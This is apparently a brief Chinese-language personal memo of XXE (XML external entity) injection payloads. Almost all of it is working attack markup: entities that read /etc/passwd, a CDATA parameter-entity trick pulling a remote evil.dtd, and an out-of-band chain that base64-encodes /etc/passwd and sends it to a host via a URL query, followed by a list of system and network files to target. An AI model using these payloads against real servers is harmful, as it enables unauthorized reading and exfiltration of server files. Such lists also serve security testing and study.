XXE 总结笔记

记录一下常用 xxe payload

想到啥写啥, 只是一个备忘录

SYSTEM

1
<!ENTITY xxs SYSTEM "file:///etc/passwd" >

PUBLIC

1
<!ENTITY % remote PUBLIC "dtd" "http://127.0.0.1/evil.dtd">

通用实体

1
2
3
4
5
6
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY file SYSTEM "file:///etc/passwd">]>
<test>
&file;
</test>

参数实体 (利用 CDATA)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY % start "<![CDATA[">
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://127.0.0.1/evil.dtd">
%dtd;]>
<test>
&all;
</test>

evil.dtd

1
2
<?xml version="1.0" encoding="utf-8"?>
<!ENTITY all "%start;%xxe;%end;" >

payload

1
2
3
4
<!DOCTYPE test [
<!ENTITY % remote SYSTEM "http://127.0.0.1/evil.dtd">
$remote;%int;%send;
]>

evil.dtd

1
2
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://127.0.0.1/?p=%file;'>">
1
2
3
4
5
6
7
/etc/network/interfaces
/etc/hosts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie